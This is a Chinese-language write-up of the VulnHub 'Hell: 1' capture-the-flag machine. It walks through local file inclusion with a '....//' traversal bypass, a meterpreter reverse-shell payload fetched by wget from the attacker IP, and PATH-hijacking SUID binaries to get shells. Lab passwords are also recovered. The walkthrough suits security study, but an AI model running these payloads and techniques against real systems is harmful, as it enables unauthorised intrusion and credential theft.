2026-04-01

Hell: 1

项目地址：https://download.vulnhub.com/hell/hell.ova

是一个打包好的镜像文件

注意：导入 vmx 时一定要选择我已移动，否则没网

使用 Nmap 扫描出开放服务及操作系统版本

666 端口响应内容如下

1
2
3

Welcome to the Admin Panel
Archiving latest version on webserver (echoserver.bak)...
Starting echo server and monitoring...

扫描目录

继续扫描 /manual 和 /persinal 目录没有结果，于是看看君子协议

有新的路径了，继续扫描可算是有结果了

弱口令

Admin

打开是一个登录页面

去别网页看看有没有泄露一些用户名之类的

结合起来扔给 Ai 生成一个字典文件得到

1	jack/g0tmi1k69

越权

intruder

在 Personal Folder 中发现新的登录框

连续错误三次会报错回显到网页上

检查 Cookie 看到一个 intruder 的值为 1

改为 0 后报错就不见了

任意文件读取

intruder（双写绕过）

很多 PHP 开发者为了模块化处理错误，喜欢使用 include 或 require 来加载不同的模板

1
2
3

if ($_COOKIE['intruder'] == '1') {
    include($error_page); // 如果 $error_page 变量被污染，即存在 LFI
}

怀疑这里存在本地文件包含漏洞，尝试获取 /etc/paswd 文件

但是 ../ 貌似被过滤了，使用 ....// 代替绕过

当攻击者输入 ....// 时，过滤过程如下：

匹配阶段： 过滤器从左向右扫描，在 ....// 中发现了中间的 ../
替换阶段： 过滤器将匹配到的 ../ 删掉
结果产出： 剩下的两端字符——左边的 .. 和右边的 /——自动“塌陷”合并，变成了 ../

1	....//....//....//....//....//....//etc/passwd

RCE

Notes（结合任意文件读取组合拳）

在 Notes 中发现一个输入框，它会将内容保存到 note.txt 中

可以尝试编写一个反弹 Shell，先使用 MSF

1	msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=443 R > sneaky.txt

然后监听

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set lhost 192.168.0.110
lhost => 192.168.0.110
msf exploit(handler) > run

然后注入命令

1	<?php echo shell_exec('wget http://192.168.0.110/sneaky.txt -O /tmp/sneaky.txt 2>&1');?>

Cookie 被修改为 /tmp/note.txt（至于为什么是 /tmp 目录，只能说凭感觉）

页面重新加载时，我们的恶意 note.txt 文件会被包含在内，PHP 会被解析，我们的有效载荷文件会被下载

再次修改 Cookie 以包含 /tmp/sneaky.txt

[*] Sending stage (40551 bytes) to 192.168.0.103
[*] Meterpreter session 1 opened (192.168.0.110:443 -> 192.168.0.103:48153) at 2014-07-17 21:55:37 +0100

meterpreter >

提权

Python 升级为交互式 Shell

1	python -c 'import pty;pty.spawn("/bin/sh")'

敏感信息泄露

在 /super_secret_login_path_muhahaha/ 目录下的文件中使用 grep 命令快速搜索单词password，结果如下

$ grep password /var/www/super_secret_login_path_muhahaha/*
index.php:<INPUT name="password" id="password" type="password" value=""/>
login.php:    $password = mysql_escape_string($_POST["password"]);
login.php:    // mysql_connect("127.0.0.1", "Jack", "zgcR6mU6pX") or die ("Server Error"); I'll change this back once development is done. Got sick of typing my password.
login.php:   $sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";
personal.php:<INPUT name="password" id="password" type="password" value=""/>

拿到密码

1	zgcR6mU6pX

提权成功

$ su jack
Password: zgcR6mU6pX

$ whoami
jack
$

PGP 加密邮件破解

在 /var/mail/jack/received 目录下有一封加密邮件

Jack 在本地主机上使用 PGP，因此他的 PGP 密钥存储在 /home/jack/.pgp 中，并附有一条注释，为我们提供了密码提示

$ ls -l .pgp
ls -l .pgp
total 12
-rwx------ 1 jack jack   39 Jun 18 12:35 note
-rwx------ 1 jack jack 1802 Jun 18 12:20 pgp.priv
-rwx------ 1 jack jack  890 Jun 18 12:24 pgp.pub
$ cat .pgp/note
The usual password as with everything.
$

我们可以假设密码是 g0tmi1k69 或 zgcR6mU6pX

GPG 已安装，因此下一步合乎逻辑的做法是尝试使用这两个密码之一以及 Jack 的 PGP 私钥来解密电子邮件

$ gpg --import .pgp/pgp.priv
gpg: key 3F18AB0A: secret key imported
gpg: /home/jack/.gnupg/trustdb.gpg: trustdb created
gpg: key 3F18AB0A: public key "jack@cowlovers.com" imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
$ gpg -o email.txt /var/mail/jack/received/message.eml

You need a passphrase to unlock the secret key for
user: "jack@cowlovers.com"

2048-bit RSA key, ID 3F18AB0A, created 2014-06-18

Enter passphrase: g0tmi1k69
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 2048-bit RSA key, ID 3F18AB0A, created 2014-06-18
      "jack@cowlovers.com"
gpg: WARNING: message was not integrity protected
$ cat email.txt
Ok Jack. I've created the account 'milk_4_life' as per your request. Please stop emailing me about this now or I'm going to talk to HR like we discussed.

The password is '4J0WWvL5nS'

继续提权到新的账号

$ su milk_4_life
Password: 4J0WWvL5nS

$ whoami
milk_4_life
$

环境变量劫持

milk_4_life 的主文件夹非常空，只有一个名为 game 的二进制文件

但是，它的所有者是 george 用户，并且设置了 suid 属性

1
2
3

$ ls -l
total 20
---s--x--x 1 george      george      5743 Jun 19 18:24 game

运行该二进制文件会产生以下输出

1 2	$ ./game I'm listening

这台虚拟机上没有 netstat 命令，我们使用 ss 代替

该程序确实是在监听，端口是 1337

$ ss -lp
State       Recv-Q Send-Q    Local Address:Port    Peer Address:Port
LISTEN      0      50        127.0.0.1:mysql       *:*
LISTEN      0      128       :::sunrpc             :::*
LISTEN      0      128       *:sunrpc              *:*
LISTEN      0      128       :::http               :::*
LISTEN      0      128       :::38035              :::*
LISTEN      0      128       *:35380               *:*
LISTEN      0      128       :::ssh                :::*
LISTEN      0      128       *:ssh                 *:*
LISTEN      0      10        *:1337                *:*
LISTEN      0      20        ::1:smtp              :::*
LISTEN      0      20        127.0.0.1:smtp        *:*
LISTEN      0      10        *:666                 *:*

使用 telnet 远程连接看看发现是个小游戏

$ telnet 127.0.0.1 1337
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Type 'START' to begin

START
Starting...

You have 30 seconds to get as many points as you can, beat the high score! (High Score: 133723)

Quick what's... 924 x 541? Umm
Quick what's... 982 x 21? No idea
Quick what's... 194 x 542? Really ?
Quick what's... 679 x 733? WHY WOULD I NEED TO KNOW THIS !?
Quick what's... 960 x 248? I give up.
Quick what's... 718 x 646? THANKS OBAMA !
Quick what's... 162 x 784? ^C
Connection closed by foreign host

编写脚本破解这个数学题

import socket
import re


def main():
    # 1. 创建TCP socket对象
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # 2. 连接到本地主机的1337端口（硬编码地址，可根据需要修改）
    server_address = ('127.0.0.1', 1337)
    client_socket.connect(server_address)

    # 3. 接收初始欢迎信息（假设服务器会发送一些欢迎数据）
    client_socket.recv(1024)

    # 4. 发送"START"命令开始认证/登录过程
    client_socket.send(b'START\n')  # 使用字节串以兼容Python 3

    # 5. 接收登录响应（假设固定长度110字节，可根据实际情况调整）
    client_socket.recv(110)

    # 6. 循环处理服务器发来的数学问题
    while True:
        data = client_socket.recv(200)  # 每次最多接收200字节
        if not data:
            break  # 连接关闭，退出循环

        # 使用正则表达式提取问题中的乘法表达式
        # 示例问题格式: "Quick what's... 123 x 456?"
        matches = re.findall(r"Quick what's... (.*?)\?", data.decode())

        if not matches:
            # 如果没有匹配到问题，则打印接收到的数据（可能是最终结果或错误信息）并退出循环
            print(data.decode())
            break

        # 解析乘法表达式，格式为 "a x b"
        expression = matches[0]
        num1_str, num2_str = expression.split(' x ')
        num1 = int(num1_str)
        num2 = int(num2_str)
        result = num1 * num2

        # 打印计算结果（可用于调试）
        print(result)

        # 将结果发送回服务器
        client_socket.send(str(result).encode() + b'\n')

    # 7. 接收服务器最后的响应（例如完成信息）并打印
    final_response = client_socket.recv(1024)
    print(final_response.decode())

    # 8. 关闭socket连接
    client_socket.close()


if __name__ == '__main__':
    main()

运行脚本

$ python gamey3.py
125451
150858
498300
493353
60564
**** SNIP ****
174386
841312
53636
Final Score: 412619

!*!*!*!*! Congratulations, new high score (412619) !*!*!*!*!

I hear the faint sound of chmodding.......

看起来，当最高分被打破时，这个二进制文件会执行某个操作

我不确定它修改了什么权限，但我很好奇我们是否可以反过来利用它，让它运行一个伪造的二进制文件，劫持环境变量呢？

创建恶意二进制文件

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
 setuid( 1000 );
 system("id");
 system( "/bin/sh -i" );
}

修改路径环境变量，使 /tmp 成为第一个检查的位置

1
2
3

$ PATH=/tmp:$PATH
$ export | grep PATH
export PATH='/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games'

分数被打破，我们确实被降级到一个新的 shell，成为 george 用户

$ ./game
I'm listening
uid=1002(milk_4_life) gid=1002(milk_4_life) euid=1000(george) groups=1000(george),1002(milk_4_life)
$

TrueCrypt 爆破

乔治的个人文件夹里只有一个文件——TrueCrypt 加密容器

挂载 TrueCrypt 容器需要我们知道容器密码，但我们目前还没有这个密码

george@hell:~$ truecrypt --mount container.tc
Enter mount directory [default]:
Enter password for /home/george/container.tc:
Enter keyfile [none]:
Protect hidden volume (if any)? (y=Yes/n=No) [No]:
No password or keyfile specified.

再仔细看看，乔治似乎也报名参加了 RockYou

From: admin@rockyou.com
To: super_admin@hell.com
Subject: Account Activation
Date: 13th November 2009

Thanks for signing up for your account. I hope you enjoy our services.

爆破出密码为

1	letsyouupdateyourfunnotesandmore

SSH 私钥泄露

现在挂载它就容易多了

george@hell:~$ truecrypt --mount container.tc
Enter mount directory [default]: ./tc
Enter password for /home/george/container.tc: letsyouupdateyourfunnotesandmore
Enter keyfile [none]:
Protect hidden volume (if any)? (y=Yes/n=No) [No]:

george@hell:~$ cd tc
george@hell:~/tc$ ls -l
total 2
-rwx------ 1 george george 1679 Jul  5 20:01 id_rsa
george@hell:~/tc$

让我们用这个密钥以 bazza 的身份通过 SSH 登录

george@hell:~/tc$ ssh bazza@127.0.0.1 -i ./id_rsa
Linux hell 3.2.0-4-486 #1 Debian 3.2.57-3+deb7u2 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 13 21:18:28 2014 from 192.168.0.102
$ whoami
bazza

环境变量劫持

我们再次遇到了两个设置了 SUID 属性的二进制文件，不过这次我们可以读取这些文件，这意味着我们可以反编译它们

先来看 part1，它对指定文件进行完整性校验，确认无误后执行目标程序

int __cdecl main()
{
  int result;
  _BYTE v1[3];
  FILE *v2;
  const char *v3;
  const char *v4;

  // 预期的sha256sum输出（哈希值 + 文件名 + 换行符），用于校验part2文件
  v4 = "900462fbf9593f1a4b753f1729c431abc80932a151e9b293e13822a91f9641c1  /home/bazza/part2\n";
  // 预期的sha256sum输出，用于校验/usr/bin/id文件
  v3 = "1003a011c5bdb65a07a8f92feb6b7d7ecbf3a3ff0f2a46abbe5c777c525996d8  /usr/bin/id\n";
  
  // 提示开始检查part2的完整性
  printf("Checking integrity of part2...");
  
  // 执行sha256sum命令计算part2的哈希值，并打开读取管道
  v2 = popen("sha256sum /home/bazza/part2", "r");
  if ( !v2 )
    puts("Failed to run command"); // 如果管道打开失败，输出错误信息
  
  // 从命令输出中读取一行（最多1034字节）到v1缓冲区
  fgets(v1, 1034, v2);
  
  // 比较实际输出与预期值v4
  if ( strcmp(v1, v4) )
  {
    // 如果不匹配，说明文件损坏或路径错误
    puts("Uh oh.... Corrupted or in wrong directory (/home/bazza/)\n");
    result = 0;
  }
  else
  {
    // 匹配成功，输出完成信息
    puts(" Done!!\n");
    
    // 开始检查调用目标（/usr/bin/id）的完整性
    printf("Checking integrity of calling target...");
    
    // 再次执行sha256sum命令计算/usr/bin/id的哈希值
    v2 = popen("sha256sum /usr/bin/id", "r");
    if ( !v2 )
      puts("Failed to run command");
    
    // 读取命令输出
    fgets(v1, 1034, v2);
    
    // 比较实际输出与预期值v3
    if ( strcmp(v1, v3) )
    {
      puts("Target corrupt\n"); // 不匹配则提示目标损坏
      result = 0;
    }
    else
    {
      // 两个文件均校验通过，输出确认信息
      puts(" Done!!\n\nBinary and target confirmed.");
      
      // 执行part2程序
      system("/home/bazza/part2");
      
      // 关闭管道
      pclose(v2);
      result = 0;
    }
  }
  
  return result; // 返回0
}

再来看 part2，简单的权限检查示例

int __cdecl main()
{
  __gid_t v0;
  int result;

  // 检查当前进程的有效组ID（effective group ID）是否为1003
  if ( getegid() == 1003 )
  {
    // 如果组ID为1003，输出一句幽默提示，并执行系统命令"id"显示当前用户身份信息
    puts("\nCan't touch this *nah na na na na naaaaaaaa nah*");
    system("id");
    result = 0;
  }
  else
  {
    // 如果组ID不是1003，获取实际组ID并输出错误信息，提示用户需要使用part1
    v0 = getegid();
    printf("\n\nError! %d ID detected ... you're not allowed to run this, please use part 1!\n", v0);
    result = 0;
  }
  return result;
}

因此，只有当有效组标识符为 1003 时，part2 才会运行

运行 part1 会改变我们的有效组标识符，运行 part2 会改变我们的有效用户标识符，但似乎不会让我们以该用户 (oj) 的身份进入 shell

$ ./part1
Checking integrity of part2... Done!!

Checking integrity of calling target... Done!!

Binary and target confirmed.

Can't touch this *nah na na na na naaaaaaaa nah*
uid=1004(bazza) gid=1004(bazza) euid=1005(oj) egid=1003(developers) groups=1005(oj),1004(bazza)
$ whoami
bazza

进一步查看第二部分的源代码发现，它并没有为 system(“id”) 函数使用绝对路径，因此我们可以像之前修改伪造的 chmod 二进制文件那样，诱使该应用程序运行一个伪造的 id 二进制文件

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
 setuid( 1005 );
 system("/usr/bin/id");
 system( "/bin/sh -i" );
}

文件已编译，放置在 /tmp 目录下并设置为可执行文件

环境变量路径已按上次修改，一切就绪

$ ./part1
Checking integrity of part2... Done!!

Checking integrity of calling target... Done!!

Binary and target confirmed.

Can't touch this *nah na na na na naaaaaaaa nah*
uid=1004(bazza) gid=1004(bazza) euid=1005(oj) egid=1003(developers) groups=1005(oj),1004(bazza)
$ whoami
oj

oj 用户只有一个文件，一个名为 echo 的二进制文件，它的功能就是重复你发送的内容

这一关需要结合二进制——字符串格式化漏洞去打才行，所以不会记录